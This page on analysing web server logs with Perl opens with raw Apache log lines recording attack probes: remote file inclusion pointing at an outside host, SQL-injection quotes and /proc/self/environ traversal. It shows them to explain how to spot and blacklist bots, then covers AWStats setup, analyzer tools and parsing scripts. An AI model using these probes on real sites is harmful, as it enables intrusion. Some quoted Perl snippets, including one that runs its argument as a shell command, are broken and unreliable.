84.242.142.98 - - [16/Aug/2010:11:42:36 -0600] "GET /Solaris/Security/solaris_root_password_recovery.shtml////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 302 808 "-" "libwww-perl/5.65"
84.242.142.98 - - [16/Aug/2010:11:42:36 -0600] "GET /400.shtml?_SERVER%5bDOCUMENT_ROOT%5d=http://genol.fileave.com/MC22.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.65"
84.242.142.98 - - [16/Aug/2010:11:42:36 -0600] "GET ////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 500 747 "-" "libwww-perl/5.65"
84.242.142.98 - - [16/Aug/2010:11:42:37 -0600] "GET /Solaris/Security////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 500 767 "-" "libwww-perl/5.65"
203.147.62.92 - - [16/Aug/2010:12:21:15 -0600] "GET /Scripting/php.shtml/index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:16 -0600] "GET /Scripting/php.shtml/index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:16 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:16 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:16 -0600] "GET /index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:17 -0600] "GET /index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:17 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:17 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:17 -0600] "GET /Scripting/index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:18 -0600] "GET /Scripting/index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:18 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
203.147.62.92 - - [16/Aug/2010:12:21:18 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
194.146.226.69 - - [16/Aug/2010:12:26:19 -0600] "GET /index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834"
194.146.226.69 - - [16/Aug/2010:12:26:19 -0600] "GET /400.shtml?pageid=' HTTP/1.1" 500 756 "-" "libwww-perl/5.834"
194.146.226.69 - - [16/Aug/2010:12:28:51 -0600] "GET /Admin/Tivoli/TEC/Event_console/index.shtml/index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834"
194.146.226.69 - - [16/Aug/2010:12:28:52 -0600] "GET /400.shtml?pageid=' HTTP/1.1" 500 756 "-" "libwww-perl/5.834"
194.146.226.69 - - [16/Aug/2010:12:28:52 -0600] "GET /index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834"
194.146.226.69 - - [16/Aug/2010:12:28:52 -0600] "GET /400.shtml?pageid=' HTTP/1.1" 500 756 "-" "libwww-perl/5.834"
194.146.226.69 - - [16/Aug/2010:12:28:53 -0600] "GET /Admin/Tivoli/TEC/Event_console/index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834"
194.146.226.69 - - [16/Aug/2010:12:28:53 -0600] "GET /400.shtml?pageid=' HTTP/1.1" 500 756 "-" "libwww-perl/5.834"
77.243.239.121 - - [16/Aug/2010:12:41:05 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:12:41:06 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:12:41:36 -0600] "GET /Scripting/pipes.shtml//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:12:41:37 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:12:41:37 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:12:41:37 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:12:41:38 -0600] "GET /Scripting//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:12:41:38 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:12:41:39 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:12:41:39 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:12:41:48 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:12:41:48 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:12:42:24 -0600] "GET /Scripting/pipes.shtml//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:12:42:24 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:12:42:25 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:12:42:25 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:12:42:25 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:12:42:26 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:12:42:26 -0600] "GET /Scripting//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:12:42:26 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
89.111.176.226 - - [16/Aug/2010:12:42:29 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:12:42:29 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:12:42:38 -0600] "GET /Scripting/pipes.shtml//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:12:42:39 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:12:42:39 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:12:42:40 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:12:42:40 -0600] "GET /Scripting//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:12:42:40 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:12:43:40 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:12:43:41 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"

One common thing for such record is the usage of libwww-perl. Greping on string libwww brings us more complete picture. Generally those are "blind probes" used by script kiddies to detect some exploitable vulnerability.

Extracting IP addresses gives you the first draft of the "blacklist" and that top dozen can be used to block those rogue addresses from accessing your site. To get such a "dirty dozen" you can use a simple pipe which can be made into a function or shell script:

grep libwww $1 | cut -d' ' -f 1 | sort -n | uniq -c | sort -rn | head -12 > $1.dirty 

Below are the results of processing of the list from above:

20	83.149.125.174	home.w-sieci.pl
18	80.67.20.21	mayermail.de
12	200.69.222.122	contactar01.gestionarnet.com
11	64.78.163.2	nickentgolf.com
11	62.193.224.166	wpc0230.amenworld.com
10	86.109.161.201	lincl239.ns1.couldix.com
 9	87.230.2.113	lvps87-230-2-113.dedicated.hosteurope.de
 9	85.214.55.73	mind-creations.net
 7	193.192.249.157	
 6	87.118.96.254	ns.km22206-02.keymachine.de
 6	72.55.153.108	ip-72-55-153-108.static.privatedns.com
 6	66.147.239.104	host.1sbs.com
 6	216.246.52.59	server.dynasoft.com.ph
 6	213.195.77.225	225.77.195.213.ibercom.com
 5	217.115.197.51	node11.cluster.nxs.nl

AWstats

There are a lot of free http log file analysis written in Perl out there that haven't been updated since the mid 90's. However  AWstats is one of the few well-written scripts that is both free, and up to date. 

\There are a lot of free http log file analysis tools out there that haven't been updated since the mid 90's, awstats however is both free, and up to date. It looks a bit like web trends (though I haven't used web trends in several years). Here's an online demo. awstats can be used on several web servers including IIS, and Apache. You can either have generate static html files, or run with a perl script in the cgi-bin.

Here's a quick rundown of setting it up on unix/apache

Each virtual web site you want to track stats for should have a file /etc/awstats.sitename.conf the directives for the configuration file can be found here: http://awstats.sourceforge.net/docs/awstats_config.html they also provide a default conf file in cgi-bin/awstats.model.conf you can use this as a base.

Make sure your log files are using NCSA combined format, this is usually done in apache by saying CustomLog /logs/access.log combined you can use other formats but you have to customize the conf file.

You will probably want to edit the LogFile directive to point to where your logfile is stored, SiteDomain this is the main domain for the site, HostAliases lets you put in other domains for the site, and the DirData directive lets you specify where the awstats databases will be stored (each site will have its own file in the directory).

Once that is setup you will want to update the database this is done from the command line by running

perl awstats.pl -config=sitename -update

Now copy everything in the wwwroot folder to a web root, and visit http://sitename.com/cgi-bin/awstats.pl if you want to view other domains use /cgi-bin/awstats.pl?config=othersitename

Where sitename would be the name of your config file awstats.sitename.conf

If you want to generate static html files run the awstats_buildstaticpages.pl  script found in the tools folder. You have to give it the path to the awstats.pl  perl script, and a directory to put the static html files in.

perl awstats_buildstaticpages.pl -config=sitename -awstatsprog=/web/cgi-bin/awstats.pl 
  -dir=/web/stats/sitename/

More setup info can be found here: http://awstats.sourceforge.net/docs/index.html

If one is looking for Squid logs analyzer in Perl, Calamaris is one variant to try.  See also Proxy log analysers

There is plenty of simple Perl scripts for log processing on the Web nowadays. See for example Unix Log Analysis

Name Platform Cost Available from Notes
3Dstats UNIX free Netstore  
Analog Mac, Windows Unix free http://www.analog.cx/ Mac version also available from summary.net  
BrowserCounter UNIX free Benjamin "Snowhare" Franz  
eXTReMe Tracking Any (online service) Free eXTReMe Tracking Unique visitors, referrers, browser, geographical location... No traffic limitation
FTPWebLog UNIX free Benjamin "Snowhare" Franz  
iisstat UNIX free Lotus Development Corporation  
pwebstat Unix (requires perl5 + fly) free Martin Gleeson  
RefStats UNIX free Benjamin "Snowhare" Franz  
Relax Unix, Windows free (GPL) ktmatu Perl 5 script for referrer and search engine keyword analysis.
Webalizer Unix free (GPL) Bradford L Barrett Supports common logfile format & variations of combined logfile format, partial logs & multiple languages.
wwwstat UNIX free Roy Fielding  
W3Perl Unix, Windows free (GPL) Laurent Domisse  

Top Visited
Switchboard
Latest
Past week
Past month

NEWS CONTENTS

Old News ;-)

[Dec 27, 2014] Bots Now Outnumber Humans on the Web By ROBERT MCMILLAN

Dec 18 2014 |

Bots Now Outnumber Humans on the Web
By ROBERT MCMILLAN
Dec 18 2014
<http://www.wired.com/2014/12/bots-now-outnumber-humans-web/>

Diogo Mónica once wrote a short computer script that gave him a secret weapon in the war for San Francisco dinner reservations.

This was early 2013. The script would periodically scan the popular online reservation service, OpenTable, and drop him an email anytime something interesting opened up - a choice Friday night spot at the House of Prime Rib, for example. But soon, Mónica noticed that he wasn't getting the tables that had once been available.

By the time he'd check the reservation site, his previously open reservation would be booked. And this was happening crazy fast. Like in a matter of seconds. "It's impossible for a human to do the three forms that are required to do this in under three seconds," he told WIRED last year.

Mónica could draw only one conclusion: He'd been drawn into a bot war.

Everyone knows the story of how the world wide web made the internet accessible for everyone, but a lesser known story of the internet's evolution is how automated code-aka bots-came to quietly take it over. Today, bots account for 56 percent of all of website visits, says Marc Gaffan, CEO of Incapsula, a company that sells online security services. Incapsula recently an an analysis of 20,000 websites to get a snapshot of part of the web, and on smaller websites, it found that bot traffic can run as high as 80 percent.

People use scripts to buy gear on eBay and, like Mónica, to snag the best reservations. Last month, the band, Foo Fighters sold tickets for their upcoming tour at box offices only, an attempt to strike back against the bots used by online scalpers. "You should expect to see it on ticket sites, travel sites, dating sites," Gaffan says. What's more, a company like Google uses bots to index the entire web, and companies such as IFTTT and Slack give us ways use the web to use bots for good, personalizing our internet and managing the daily informational deluge.

But, increasingly, a slice of these online bots are malicious-used to knock websites offline, flood comment sections with spam, or scrape sites and reuse their content without authorization. Gaffan says that about 20 percent of the Web's traffic comes from these bots. That's up 10 percent from last year.

Often, they're running on hacked computers. And lately they've become more sophisticated. They are better at impersonating Google, or at running in real browsers on hacked computers. And they've made big leaps in breaking human-detecting captcha puzzles, Gaffan says.

"Essentially there's been this evolution of bots, where we've seen it become easier and more prevalent over the past couple of years," says Rami Essaid, CEO of Distil Networks, a company that sells bot-blocking software.

But despite the rise of these bad bots, there is some good news for the human race. The total percentage of bot-related web traffic is actually down this year from what it was in 2013. Back then it accounted for 60 percent of the traffic, 4 percent more than today.

[Feb 07, 2012] Perl for Web Site Management Chapter 8 Parsing Web Access Logs

Now that the hostname lookups are taken care of, it's time to write the log-analysis script. Example 8-2 shows the first version of that script.

Example 8-2: log_report.plx, a web log-analysis script (first version)

#!/usr/bin/perl -w
 
# log_report.plx
 
# report on web visitors
 
use strict;
 
while (<>) {
    my ($host, $ident_user, $auth_user, $date, $time,
            $time_zone, $method, $url, $protocol, $status, $bytes) = 
/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] "(\S+) (.+?)
 (\S+)" (\S+) (\S+)$/;
 
    print join "\n", $host, $ident_user, $auth_user, $date, $time,
        $time_zone, $method, $url, $protocol, $status,
        $bytes, "\n";
}

This first version of the script is simple. All it does is read in lines via the <> operator, parse those lines into their component pieces, and then print out the parsed elements for debugging purposes. The line that does the printing out is interesting, in that it uses Perl's join function, which you haven't seen before. The join function is the polar opposite, so to speak, of the split function: it lets you specify a string (in its first argument) that will be used to join the list comprising the rest of its arguments into a scalar. In other words, the Perl expression join '-', 'a', 'b', 'c' would return the string a-b-c. And in this case, using \n to join the various elements parsed by our script lets us print out a newline-separated list of those parsed items.

[Feb 07, 2012] how-to-start-writing-a-web-log-analyzer-in-perl

You could theoretically have as many text files as you want as command-line arguments but so far I haven't gotten that part to work, I just have:
./logprocess.pl monster.log #monster.log is the file that contains entries 

then in the code, assume all variables not specified have been declared as scalars

my $x = 0; 
my @hashstuff; 
my $importPage = $ARGV[0]; 
my @pageFile = `$importPage`; 
foreach my $line (@pageFile) 
{ 
 
    $ipaddy, $date, $time, $method, $url, $httpvers, $statuscode, $bytes, $referer, $useragent =~ m#(\d+.\d+.\d+.\d+) \S+ \S+ [(\d+/\S+/\d+):(\d+:\d+:\d+) \S+] "(\S+) (\S+) (\S+)" (\d+) (\d+) "(\S+)" "(\S+ \S+ \S+ \S+ \S+)"# 
    %info = ('ipaddy' => $ipaddy, 'date' => $date, 'time' => $time, 'method' => $method, 'url' => $url, 'httpvers' => $httpvers, 'statuscode' => $statuscode, 'bytes' => $bytes, 'referer' => $referer, 'useragent' => $useragent); 
    $hashstuff[$x] = %info; 
    $x++; 
}

[Feb 07, 2012] ch21

Listing 21.1-21LST01.PL - Read the Access Log and Parse Each Entry
 

#!/usr/bin/perl -w

$LOGFILE = "access.log";
open(LOGFILE) or die("Could not open log file.");
foreach $line () {
    ($site, $logName, $fullName, $date, $gmt,
         $req, $file, $proto, $status, $length) = split(' ',$line);
    $time = substr($date, 13);
    $date = substr($date, 1, 11);
    $req  = substr($req, 1);
    chop($gmt);
    chop($proto);
    # do line-by-line processing.
}
close(LOGFILE);

[Oct 10, 2011] w3perl

W3Perl 3.13 is a Web logfile analyzer. But it can also read FTP/Squid or mail logfiles. It allows most statistical data to be ouput with graphical and textual information. An administration interface is available to manage the package.(more)

[Aug 5, 2001] Squid2MySQL

Squid2MySQL is an accounting system for squid. It includes monthly, daily, and timed detail levels, and uses MySQL for log storage.

Eugene V. Chernyshev <evc (at) chat (dot) ru> [contact developer]

[Mar 11, 2000] Log Rhythms

O'Reilly Network

In this column I'll give you a gentle introduction to Apache web server logs and their place in monitoring, security, marketing, and feedback."

stoic Freeware web server log analysis tool Jul 05th 1999, 05:52
stable: 1.2 - devel: none license: Freeware

Stoic is a small Perl script that examines Apache or Netscape web server access logs. Reports include logfile totals, domains visiting, top documents requested, browser agent statistics, platform statistics and a bunch of other stuff.

[May 26, 1999] Webalizer scoop - January 11th 1998, 20:47 EST

Download: ftp://ftp.mrunix.net/pub/webalizer/
Alternate Download: ftp://samhain.unix.cslab.tuwien.ac.at/webalizer/
Homepage: http://www.mrunix.net/webalizer/
Changelog: ftp://ftp.mrunix.net/pub/webalizer/CHANGES

The Webalizer is a web server log analysis program. It is designed to scan web server log files in various formats and produce usage statistics in HTML format for viewing through a browser. Very good output, good charts and very fast. Just missing special mode for a total statistics (all virtual webservers) without that many details.


httplogs

ktmatu's Log tools - Three of these: (from their page)

Relax - WWW logfile referring URL and search engine keyword analysis tool. This free Perl script recognizes many search engines and organizes popular keywords used to get to your site.
Lrdns - Log Reverse Domain Name System converts numeric IP addresses in accesss log files into textual domain names. Written in Perl.
Ffcat - Prints only the new entries in a log file. Fast forwards to the position where the last run ended, and then copies only the new lines of that file to the standard output. Written in Perl.

Parsing apache log files with Perl

The following is a webalizer written in perl to analyze apache log files.

Currently, four options can (should) be given when invoking the script: -n <number> prints the top <number> accessed documents,

#!/usr/bin/perl -w

use strict;
use Getopt::Std;

open (LOG, "/var/log/httpd/adp-gmbh/xlf_log"); 

my $options = {};

# n how many urls?
# r print referers?
# f print from (which hosts)?
getopts("n:rfht:", $options);

my $methods = {};
my $urls    = {};

if ($options->{h}) {
  print "options:\n";  
  print "  -n <n>    print the top n visited urls\n";
  print "  -r        show referrers\n";
  print "  -f        show who has visited (f = from)\n";
  print "  -t <n>    show top <n> referrers and froms only\n";
  print "\n";
  exit;
}

my $ignoreHosts = {
  "xxx.yy.zzz.aaa" => {},
};

my $countGiven=0;
$countGiven = 1 if defined $options->{n};

while (my $line=<LOG>) {
  my ($host,$date,$url_with_method,$status,$size,$referrer,$agent) = $line =~
          m/^(\S+) - - \[(\S+ [\-|\+]\d{4})\] "(\S+ \S+ [^"]+)" (\d{3}) (\d+|-) "(.*?)" "([^"]+)"$/;

  next unless $date =~ m#\d{1,2}/Feb/2002#;

  print $line unless $url_with_method;
  my ($method, $url, $http) = split /\s+/, $url_with_method;

  $url =~ s/\?(.*)//;
  $referrer=~ s/\?(.*)//;

  push @{$methods->{$method}}, $url;
  $urls->{$url} -> {host    } -> {$host}     ++;
  $urls->{$url} -> {count   }                ++;
  $urls->{$url} -> {referrer} -> {$referrer} ++;
} 

foreach my $m (keys %{$methods}) {
  print "$m : " . @{$methods->{$m}} . "\n";
}

my $nofUrls = 0;
foreach my $url (sort {$urls->{$b}->{count} <=> $urls->{$a}->{count} } keys %{$urls}) {

  printf "%5d %s\n\n", $urls->{$url}->{count}, $url;

  my @linesOut;

  if ($options->{f}) {
    my $currentLine=0;
    printf "  %6s%-35s"," ","hosts";
    foreach my $host (sort {$urls->{$url}->{host}->{$b} <=> $urls->{$url}->{host}->{$a} } keys %{$urls->{$url}->{host}}) {
      last if $currentLine > $options->{t};
      $linesOut[$currentLine] .= sprintf "  %5d %-35.35s" ,$urls->{$url}->{host}->{$host}, $host;
      $currentLine++;
    }
  }

  if ($options->{r}) {
    my $currentLine=0;
    printf "  %6s%-55s"," ","referrers";
    

    foreach my $referrer (sort {$urls->{$url}->{referrer}->{$b} <=> $urls->{$url}->{referrer}->{$a} } keys %{$urls->{$url}->{referrer}}) {
      last if $currentLine > $options->{t};
      $linesOut[$currentLine] .= sprintf "  %5d %-55.55s" ,$urls->{$url}->{referrer}->{$referrer}, $referrer;
      $currentLine++;
    }
  }
  print "\n";

  foreach my $line (@linesOut) {
    print "$line\n";
  }

  print "\n";
  if ($countGiven) {
    last if $nofUrls >= $options->{n};
  }
  $nofUrls++;
}

dailystats

What's so special about this program?

When we started out writing this program, people asked us "why write yet another statistics program for your weblog when there are dozens of them for free on the web including all possible reports and analyses?"

True, but we don't need a program that generates 12-page reports about everything that can possibly be found through the logs. We need to monitor daily for our site, a handful of important aspects/trends of our traffic. We don't want them buried in pages and pages of other, mostly useless, information. We wanted a program that would show what we thought was important. So we made it, and we decided to also offer it for free here.

Perhaps you're interested to watch some other figures than this program doesn't. There are so many free web log analysis programs that we're sure you'll find a suitable one for your site. Otherwise, the trends that we watch with this program, are pretty much the most essential and informative ones, and you should definetly have a program to investigate them.

Features

Requirements

This program works with the plain or combined logs that the Apache web server generates. You might get IIS to generate a compatible log, but I won't get into that. Other than that, all you need is perl (and reliable webhosting) to run it.

Download

Click here to download dailystats-3.0.tgz.

Installation/Usage

There is a README file in the archive you just downloaded, explaining how to install it and run it.

Licence

Perlfect Daily Stats is freely distributed under the GNU Public Licence.

How To Install, Secure, And Automate AWStats (CentOS-RHEL)

HowtoForge

Now that YUM has its additional repository we are ready to install. From the commandline type:

yum install awstats

Modify AWStats Apache Configuration:

Edit /etc/httpd/conf.d/awstats.conf (Note: When putting your conf file in the /etc/httpd/conf.d/ folder it's automatically loaded as part of the Apache configuration. There is no need to add it again into httpd.conf. This setup is usually for one of two reasons; A cleaner approach and separating of different applications in their own configuration files, or you are in a hosted environment that does not allow for direct editing of httpd.conf):

Alias /awstats/icon/ /var/www/awstats/icon/

ScriptAlias /awstats/ /var/www/awstats/
<Directory /var/www/awstats/>
        DirectoryIndex awstats.pl
        Options ExecCGI
        order deny,allow
        allow from all
</Directory>

Alias /awstatsclasses "/var/www/awstats/lib/"
Alias /awstats-icon/ "/var/www/awstats/icon/"
Alias /awstatscss "/var/www/awstats/examples/css"

Note: the mod_cgi module of Apache must be pre-loaded into Apache otherwise Apache will not try to view the file, it will try to execute it. This can be done in two ways, either enable for the entire web server, or utilizing VirtualHosts, enable for AWStats.

Edit the following lines in the default awstats configuration file /etc/awstats/awstats.localhost.localdomain.conf:

SiteDomain="<server name>.<domain>"
HostAliases="<any aliases for the server>"

Rename config file:

mv /etc/awstats/awstats.localhost.localdomain.conf /etc/awstats/awstats.<server name>.<domain>.conf

Update Statistics (Note: By default, statistics will be updated every hour.):

/usr/bin/awstats_updateall.pl now -confdir="/etc" -awstatsprog="/var/www/awstats/awstats.pl"

Start Apache:

/etc/init.d/httpd start

To automate startup of Apache on boot up, type

chkconfig --add httpd

Verify Install

Go to http://<server name>.<domain>/awstats/awstats.pl?config=<server name>.<domain>

Securing AWStats

Setting File System Permissions

The webserver needs only read-access to your files in order for you to be able to access AWStats from the browser. Limiting your own permissions will keep you from accidentally messing with files. Just remember that with this setup you will have to run perl to execute scripts rather than executing the scripts themselves.

$ find ./awstats -type d -exec chmod 701 '{}' \;
$ find ./awstats -not -type d -exec chmod 404 '{}' \;

Apache doesn't need direct access to AWStats configuration files therefore we can secure them tightly and not affect the relationship between them. To ensure that your .htaccess files are not readable via browser:

chmod 400 /etc/awstats/*.conf

Protecting The AWStats Directory With And Adding .htaccess

To secure the Awstats folder(s), is a measured process. Ensuring ownership of the awstats folder is owned by the user that needs access to it, creating an htpasswd.users file and adding the corresponding .htaccess file to authenticate against it. Let's first secure the awstats folder by typing the below from the command-line:

find ./awstats -type d -exec chmod 701 '{}' \;
find ./awstats -not -type d -exec chmod 404 '{}' \;

Now that our folders have been secured, we'll need to create the .htpasswd.users file. Go to the /etc/awstats folder and execute the following command:

htpasswd -c /etc/awstats/htpasswd.users user

(Select whatever username you'd like.)

It'll ask you to add a password for the user you've selected, add it and re-type it for confirmation and then save. The final step is to create an .htaccess file pointing to the .htpasswd file for authentication. Go to /var/www/awstats/ and create a new file called .htaccess using your favorite editor, typically nano or vi tend to be the more popular ones. In this example we'll use vi. From the command line type

vi .htaccess

An alternate method of creating an .htaccess file is using the Htaccess Password Generator. Add the following content to your newly created .htaccess file:

AuthName "STOP - Do not continue unless you are authorized to view this site! - Server Access"
AuthType Basic
AuthUserFile /etc/awstats/htpasswd.users
Require valid-user
htpasswd -c /etc/awstat/htpasswd.users awstats_online

Once done, secure the .htaccess file by typing:

chmod 404 awstats/.htaccess

[Mar 30,2006] Building and Using Analog on Solaris by Sandra Henry-Stocker

open.itworld.com

Analog is a free web traffic analysis tool that prepares reports on activity on your web sites, including graphs that summarize hourly, daily, file size file type, visiting site, return codes and numerous other statistics that illustrate how your web sites are being used. I recently compiled and deployed Analog on a couple of Solaris 9 servers. Today's column is a how-to on building Analog and a quick introduction to how it works.

To compile Apache on a Solaris system, you should first grab a copy of the source code. I went to http://www.analog.cx/download.html and downloaded analog-6.0.tar.gz. This command should work on the command line if you have wget installed:

wget http://www.analog.cx/analog-6.0.tar.gz

I then gunzipped and extracted the contents of the downloaded file and attempted to compile the application: $ gunzip analog-6.0.tar.gz $ tar xf analog-6.0.tar $ cd analog-6.0 $ make

My attempt to compile Analog ran into some problems -- notably undefined symbols.

        $ make
        cd src && make
        make[1]: Entering directory `/export/home/henrystocker/analog-6.0/src'
        gcc            -O2      -DUNIX          -c alias.c
        gcc            -O2      -DUNIX          -c analog.c
        gcc            -O2      -DUNIX          -c cache.c
        ... omitted output ...
        Undefined                       first referenced
         symbol                             in file
        gethostbyaddr                       alias.o
        inet_addr                           alias.o
        ld: fatal: Symbol referencing errors. No output written to ../analog
        collect2: ld returned 1 exit status
        make[1]: *** [analog] Error 1
        make[1]: Leaving directory `/export/home/henrystocker/analog-6.0/src'
        make: *** [analog] Error 2

I soon figured out that I needed to make a small change to one of my Makefiles. I made the change with this perl command, adding the network services library after noting that the man pages for the undefined symbols both referenced -lnsl.
        $ cd src
        $ perl -i -p -e "s/LIBS = -lm/LIBS = -lnsl -lm/" Makefile

My LIBS line then looked like this: 

        LIBS = -lnsl -lm (added -lnsl)

After this change, Analog compiled without a hitch: 

        $ cd ..
        $ make
        cd src && make
        make[1]: Entering directory `/export/home/shs/analog-6.0/src'
        gcc            -O2      -DUNIX          -c alias.c
        gcc            -O2      -DUNIX          -c analog.c
        gcc            -O2      -DUNIX          -c cache.c
